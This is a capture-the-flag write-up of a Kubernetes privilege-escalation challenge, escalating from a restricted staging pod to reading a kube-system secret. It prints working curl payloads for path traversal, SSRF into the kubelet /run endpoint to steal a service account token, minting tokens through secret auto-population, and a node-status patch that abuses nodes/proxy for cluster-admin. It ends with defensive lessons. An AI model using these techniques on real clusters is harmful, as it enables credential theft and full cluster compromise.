Game of Pods CTF: Kubernetes Privilege Escalation - Complete Technical Writeup
Challenge Overview
This writeup documents the complete exploitation chain for the "Game of Pods" Kubernetes CTF challenge. The challenge required escalating from minimal permissions in a staging namespace to cluster administrator access, ultimately retrieving a flag stored as a secret in the kube-system namespace.
Duration: October 27 - December 10, 2025 (~6 weeks)
The Final Attack Chain
- Initial access with severely limited RBAC permissions
- Discovery of a vulnerable debugging service (k8s-debug-bridge)
- Path traversal exploitation to bypass namespace restrictions
- SSRF vulnerability discovery via parameter injection
- Service account token extraction via kubelet command execution
- Leveraging Kubernetes secret auto-population behavior
- Node status manipulation to redirect API server traffic
- Cluster-admin access via nodes/proxy privilege escalation
Initial Access
Upon spawning into the challenge environment, we landed in a pod with the following constraints:
- Pod: `test`
- Namespace: `staging`
- Service Account: `system:serviceaccount:staging:test-sa`
- Cluster: K3s `v1.31.5+k3s1`
RBAC Permissions (test-sa)
The service account had extremely limited permissions:
- `get`, `list`, `watch` on `pods` in the `staging` namespace only (a hypothetical Role granting exactly this is sketched below)
- No access to secrets, configmaps, or other resources
- No access to other namespaces
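For reference, a minimal Role granting exactly these verbs would look like the sketch below; the manifest is a hypothetical reconstruction, since we never saw the actual RBAC objects:

```yaml
# Hypothetical reconstruction of test-sa's Role (names assumed)
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-reader   # assumed name
  namespace: staging
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list", "watch"]
```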
Four Cryptic Hints
The challenge provided four hints that guided our exploration:
- "Images tend to live together in herds called registries" - Pointed to container registry credential exploitation
- "I always forget the proper way to construct URLs in Golang. I guess %s will do the trick" - Golang format string vulnerability
- "Creating secrets in k8s can produce surprising results" - Service account token auto-population
- "Kubelet authentication bypass through API Server Proxy" - Reference to CVE-2020-8562 and nodes/proxy exploitation
Phase 1: Reconnaissance
Initial Environment Discovery
We began by mapping the environment:
# Discovered limited permissions
kubectl auth can-i --list
# Examined our pod configuration
kubectl get pod test -n staging -o yaml
# Extracted and decoded service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token | cut -d. -f2 | base64 -d | jq .
Key findings:
- Node name: `noder`
- Pod IP: `10.42.0.2`
- Service account token with a 1-year expiration
- Pod pulling from a private Azure Container Registry: `hustlehub.azurecr.io`
Registry Exploration
The pod was pulling images from hustlehub.azurecr.io without visible imagePullSecrets in the pod spec. This suggested credentials were stored elsewhere (ServiceAccount or node-level).
Using ORAS (OCI Registry As Storage), we discovered:
- Anonymous pull access worked for some repositories
- Two registries existed: `hustlehub.azurecr.io` (public) and `morehustle.azurecr.io` (private)
- A `flag` repository existed in both registries but required authentication (enumeration commands are sketched below)
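The enumeration itself looked roughly like the commands below (ORAS v1.x syntax; exact output depends on registry ACLs):

```bash
# List repositories with anonymous access (ORAS v1.x syntax)
oras repo ls hustlehub.azurecr.io
# List tags for the flag repository
oras repo tags hustlehub.azurecr.io/flag
```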
CVE Research and Initial Exploitation Attempts
We researched CVE-2020-8562, a path traversal vulnerability in the Kubernetes API server's pod proxy feature. This allowed us to access kubelet endpoints:
# Working path traversal pattern
kubectl get --raw '/api/v1/namespaces/staging/pods/test:10250/proxy/../../../pods'
However, RBAC restrictions blocked access to most sensitive endpoints.
Phase 2: Service Discovery
Network Reconnaissance
We performed systematic network scanning to discover cluster services:
# DNS enumeration
nslookup -type=SRV _http._tcp.default.svc.cluster.local
# Port scanning service IP ranges
for i in {1..255}; do
curl -s --max-time 1 http://10.43.1.$i:80 2>&1 | head -1
done
k8s-debug-bridge Discovery
We discovered a debugging service at 10.43.1.168:80 in the app namespace:
# Reverse DNS lookup revealed the service
nslookup 10.43.1.168
# Result: k8s-debug-bridge.app.svc.cluster.local
Source Code Extraction
Using anonymous registry access, we pulled the k8s-debug-bridge container image and extracted its source code:
oras pull hustlehub.azurecr.io/k8s-debug-bridge:latest
# Extracted and decompiled the Go binary
Phase 3: Vulnerability Analysis
Path Traversal in Namespace Validation
Analysis of the k8s-debug-bridge source code revealed a critical vulnerability:
// Vulnerable code - checks wrong path index
func validateNamespace(path string) error {
pathParts := strings.Split(path, "/")
if pathParts[1] != "app" { // BUG: Should check pathParts[2]
return fmt.Errorf("only access to the app namespace is allowed")
}
return nil
}
This allowed path traversal using payloads like app/../kube-system.
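To make the bypass concrete, here is a self-contained sketch; it assumes the bridge prefixes the user-supplied namespace onto the request path before validating (the exact path template is our assumption, and the pod name is a placeholder):

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// Same check as the decompiled bridge code above.
func validateNamespace(p string) error {
	parts := strings.Split(p, "/")
	if parts[1] != "app" {
		return fmt.Errorf("only access to the app namespace is allowed")
	}
	return nil
}

func main() {
	// Assumed template: "/<namespace>/<pod>/<container>" built from user input.
	p := "/" + "app/../kube-system" + "/coredns-ccb96694c-55nwf/coredns"
	fmt.Println(validateNamespace(p)) // <nil> - parts[1] is "app", so the check passes
	fmt.Println(path.Clean(p))        // /kube-system/coredns-ccb96694c-55nwf/coredns
}
```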
Endpoint Mapping
The service exposed two endpoints:
- `/logs` - GET requests to kubelet's containerLogs endpoint
- `/checkpoint` - POST requests to kubelet endpoints
Working Exploits
# Access kube-system pod logs via path traversal
curl -X POST http://10.43.1.168:80/logs \
-H "Content-Type: application/json" \
-d '{"node_ip": "172.30.0.2", "namespace": "app/../kube-system",
"pod": "coredns-ccb96694c-55nwf", "container": "coredns"}'
# List all pods on the node
curl -X POST http://10.43.1.168:80/logs \
-H "Content-Type: application/json" \
-d '{"node_ip": "172.30.0.2", "namespace": "app",
"pod": "../../pods?", "container": ""}'
Pod Mapping
Through kubelet endpoint access, we identified all pods on the node:
| Pod | Namespace | Service Account |
|---|---|---|
| test | staging | test-sa |
| app-blog | app | app |
| k8s-debug-bridge-xxx | app | k8s-debug-bridge |
| coredns-xxx | kube-system | coredns |
Phase 4: Dead Ends and Failed Approaches
Many approaches failed but consumed significant time:
1. Direct Secret Access via Kubelet
- Kubelet doesn't expose a `/secrets` endpoint
- The `/logs/` endpoint for node filesystem access returned 403 Forbidden
2. Command Execution via /run Endpoint
- Initial attempts against the `/run` endpoint returned 405 Method Not Allowed
- The endpoint required specific URL construction
3. Format String Exploitation
- Extensive testing of `%s`, `%v`, and `%d` in various parameters
- While the format string was processed, we couldn't leverage it for data leakage
4. Direct Registry Credential Extraction
- Attempted to read K3s registry configuration files
- `/etc/rancher/k3s/registries.yaml` didn't exist in containers
5. HustleHub Application Exploitation
- Explored the app-blog web application
- Found cookie-based sessions but no credential leakage
6. TokenRequest API
- Attempted to use TokenRequest subresource
- Blocked by RBAC on service account resources
Phase 5: The Breakthrough - SSRF via node_ip Injection
Critical Discovery
We discovered that the node_ip parameter in the /checkpoint endpoint was used unsanitized in URL construction. By injecting path components and using # to truncate the remaining URL, we could access arbitrary kubelet endpoints:
# SSRF payload structure
curl -X POST "http://10.43.1.168:80/checkpoint" \
-H "Content-Type: application/json" \
-d '{"node_ip": "172.30.0.2:10250/run/app/app-blog/app-blog?cmd=<COMMAND>#",
"pod": "x", "namespace": "x", "container": "x"}'
This bypassed the debug bridge's intended functionality and directly accessed kubelet's /run endpoint for command execution.
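Hint 2 suggests what the underlying bug probably looks like: the node_ip value is dropped into a fmt.Sprintf URL template unvalidated. The format string below is a guess, but it shows why the trailing # works - everything after it becomes a URL fragment the kubelet never sees:

```go
package main

import "fmt"

func main() {
	// Hypothetical URL template ("%s will do the trick", per hint 2).
	nodeIP := "172.30.0.2:10250/run/app/app-blog/app-blog?cmd=id#"
	url := fmt.Sprintf("https://%s:10250/checkpoint/%s/%s/%s", nodeIP, "x", "x", "x")
	fmt.Println(url)
	// Effective request path: /run/app/app-blog/app-blog?cmd=id
	// The "#:10250/checkpoint/x/x/x" tail is parsed as a fragment and ignored.
}
```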
Service Account Token Extraction
Using the SSRF, we extracted the app service account token from the app-blog pod:
curl -X POST "http://10.43.1.168:80/checkpoint" \
-H "Content-Type: application/json" \
-d '{"node_ip": "172.30.0.2:10250/run/app/app-blog/app-blog?cmd=cat%20/var/run/secrets/kubernetes.io/serviceaccount/token#",
"pod": "x", "namespace": "x", "container": "x"}'
This yielded a valid JWT for system:serviceaccount:app:app.
Phase 6: Privilege Escalation via Secret Auto-Population
Understanding the "Surprising Results"
The third hint referred to a Kubernetes behavior where creating a Secret with:
- `type: kubernetes.io/service-account-token`
- the annotation `kubernetes.io/service-account.name: <target-sa>` in `metadata.annotations`

Kubernetes automatically populates such a secret with a valid token for the target ServiceAccount.
Exploitation
Using the app service account token, we created a secret targeting k8s-debug-bridge:
curl -sk -H "Authorization: Bearer $APP_TOKEN" \
"https://kubernetes.default.svc/api/v1/namespaces/app/secrets" \
-X POST -H "Content-Type: application/json" \
-d '{
"apiVersion": "v1",
"kind": "Secret",
"metadata": {
"name": "pwn-token",
"namespace": "app",
"annotations": {
"kubernetes.io/service-account.name": "k8s-debug-bridge"
}
},
"type": "kubernetes.io/service-account-token"
}'
Kubernetes automatically populated the secret with a valid token for k8s-debug-bridge.
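Reading the populated token back is then a single GET, assuming the app service account can also read secrets in the app namespace:

```bash
# Retrieve the auto-populated token (assumes get on secrets in app)
curl -sk -H "Authorization: Bearer $APP_TOKEN" \
  "https://kubernetes.default.svc/api/v1/namespaces/app/secrets/pwn-token" \
  | jq -r '.data.token' | base64 -d
```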
k8s-debug-bridge Permissions
The k8s-debug-bridge service account had significant cluster-level permissions:
- `get`, `create`, `patch` on `nodes/proxy`, `nodes/checkpoint`, and `nodes/status`
- `get`, `list`, `watch` on `nodes`
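Reconstructed from the observed permissions, the ClusterRole would look roughly like this (the name is assumed; we never retrieved the actual manifest):

```yaml
# Hypothetical reconstruction of the k8s-debug-bridge ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: k8s-debug-bridge   # assumed name
rules:
- apiGroups: [""]
  resources: ["nodes/proxy", "nodes/checkpoint", "nodes/status"]
  verbs: ["get", "create", "patch"]
- apiGroups: [""]
  resources: ["nodes"]
  verbs: ["get", "list", "watch"]
```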
Phase 7: Final Escalation - Node Status Manipulation
The nodes/proxy Attack
The fourth hint pointed to a known Kubernetes privilege escalation technique involving nodes/proxy permissions. With nodes/status PATCH permissions, we could manipulate where the API server routes traffic.
Attack Chain
- Patch node status to change the kubelet endpoint port from 10250 to 6443 (API server port)
- Use nodes/proxy - the API server would connect to itself with its own credentials (cluster-admin)
- Access any resource through the proxied connection
Implementation
# Step 1: Get current node status
curl -sk -H "Authorization: Bearer $DEBUG_TOKEN" \
"https://172.30.0.2:6443/api/v1/nodes/noder/status" > noder-orig.json
# Step 2: Patch port from 10250 to 6443
cat noder-orig.json | sed "s/\"Port\": 10250/\"Port\": 6443/g" > noder-patched.json
# Step 3: Apply the patch
curl -sk -H "Authorization: Bearer $DEBUG_TOKEN" \
-H 'Content-Type:application/merge-patch+json' \
-X PATCH -d "@noder-patched.json" \
"https://172.30.0.2:6443/api/v1/nodes/noder/status"
# Step 4: Access secrets via nodes/proxy (API server talks to itself)
curl -sk -H "Authorization: Bearer $DEBUG_TOKEN" \
"https://172.30.0.2:6443/api/v1/nodes/noder/proxy/api/v1/secrets"
Flag Retrieval
With effective cluster-admin access, we enumerated all secrets:
curl -sk -H "Authorization: Bearer $DEBUG_TOKEN" \
"https://172.30.0.2:6443/api/v1/nodes/noder/proxy/api/v1/namespaces/kube-system/secrets/flag"
Complete Attack Chain Summary
┌─────────────────────────────────────────────────────────────────┐
│ ATTACK FLOW │
├─────────────────────────────────────────────────────────────────┤
│ │
│ 1. Initial Access: test pod (staging namespace) │
│ │ │
│ ▼ │
│ 2. Discover k8s-debug-bridge service (10.43.1.168:80) │
│ │ │
│ ▼ │
│ 3. Path traversal: app/../kube-system bypasses validation │
│ │ │
│ ▼ │
│ 4. SSRF via node_ip injection with # truncation │
│ │ │
│ ▼ │
│ 5. Extract app SA token via kubelet /run command exec │
│ │ │
│ ▼ │
│ 6. Create SA token secret for k8s-debug-bridge │
│ (Kubernetes auto-populates with valid token) │
│ │ │
│ ▼ │
│ 7. Use nodes/status PATCH to redirect kubelet port to 6443 │
│ │ │
│ ▼ │
│ 8. nodes/proxy → API server connects to itself with │
│ cluster-admin credentials │
│ │ │
│ ▼ │
│ 9. Read flag from kube-system/secrets/flag │
│ │
└─────────────────────────────────────────────────────────────────┘
Technical Details
Tokens Obtained
| Service Account | Namespace | How Obtained |
|---|---|---|
| test-sa | staging | Initial access |
| app | app | SSRF + kubelet /run |
| k8s-debug-bridge | app | Secret auto-population |
Key Vulnerabilities Exploited
| Vulnerability | Description |
|---|---|
| Path Traversal | Incorrect path index validation in k8s-debug-bridge |
| SSRF | Unsanitized node_ip parameter in /checkpoint endpoint |
| Secret Auto-Population | kubernetes.io/service-account-token behavior |
| Node Status Manipulation | nodes/status PATCH + nodes/proxy (NCC-E003660-JAV) |
Tools Used
- kubectl
- curl
- jq
- nmap
- ffuf (endpoint enumeration)
- ORAS (registry access)
- base64
Lessons Learned
What Made This Challenge Difficult
- Layered Security - Multiple barriers required chaining vulnerabilities
- Misdirection - Registry credentials were a red herring (flag was in a secret, not registry)
- Subtle Vulnerabilities - Path index off-by-one and URL truncation with #
- Kubernetes Complexity - Required deep understanding of SA tokens, secrets, and node proxying
Key Insights
- Service account token secrets auto-populate - Powerful primitive for privilege escalation
- nodes/proxy + nodes/status = cluster-admin - Known attack vector documented in K8s security audits
- SSRF in internal services - Often overlooked attack surface in Kubernetes
Security Implications
1. Service Account Token Behavior
The auto-population of service account tokens when creating secrets of type kubernetes.io/service-account-token is a powerful primitive for attackers. Organizations should:
- Restrict `create` permissions on secrets in sensitive namespaces
- Use RBAC policies that prevent cross-service-account token generation (an audit check is sketched after this list)
- Monitor secret creation events for suspicious patterns
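One lightweight audit is to impersonate workload identities and check the verb directly; the identity below is this challenge's app service account, used as an example:

```bash
# Can this service account create secrets in its namespace?
kubectl auth can-i create secrets -n app \
  --as=system:serviceaccount:app:app
```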
2. nodes/proxy Privilege Escalation
The combination of nodes/proxy and nodes/status permissions can lead to cluster compromise (see the audit sketch after this list):
- Avoid granting these permissions to workload service accounts
- Use admission controllers to detect and block node status manipulation
- Monitor for unusual node configuration changes
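The same impersonation check flags the dangerous combination directly (identity taken from this challenge as an example):

```bash
# Both answering "yes" for a single identity signals this escalation path
kubectl auth can-i patch nodes --subresource=status \
  --as=system:serviceaccount:app:k8s-debug-bridge
kubectl auth can-i get nodes --subresource=proxy \
  --as=system:serviceaccount:app:k8s-debug-bridge
```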
3. Internal Service Security
The k8s-debug-bridge service demonstrated multiple security anti-patterns:
- Off-by-one errors in path validation
- Unsanitized user input in URL construction
- Overly permissive service account RBAC
Timeline
| Week | Focus | Key Achievement |
|---|---|---|
| 1 | Initial recon | Mapped environment, discovered registry |
| 2 | CVE research | Path traversal via pod proxy |
| 3 | Service discovery | Found k8s-debug-bridge, extracted source |
| 4 | Vulnerability analysis | Identified path traversal and format string |
| 5 | SSRF exploitation | Extracted app SA token, created debug-bridge token |
| 6 | Final escalation | nodes/proxy attack, retrieved flag |
References and Further Reading
- Kubernetes RBAC Documentation
- Kubernetes Service Account Token Secrets
- NCC Group: Privilege Escalation via nodes/proxy (NCC-E003660-JAV)
- CVE-2020-8562: Kubernetes API Server Path Traversal
Conclusion
This challenge effectively demonstrated the complexity of Kubernetes security and how multiple seemingly minor vulnerabilities can be chained together for complete cluster compromise. The attack path required:
- Deep understanding of Kubernetes internals (RBAC, service accounts, kubelet API)
- Creative exploitation of SSRF and path traversal vulnerabilities
- Knowledge of Kubernetes-specific privilege escalation techniques
- Persistence through multiple dead ends and failed approaches
The key takeaway: Kubernetes' layered architecture of proxies, API servers, and kubelets creates a complex web where a single misconfiguration can cascade into full cluster compromise.
Challenge created by Yuval Avrahami as part of The Ultimate Cloud Security Championship by Wiz. Writeup completed: December 10, 2025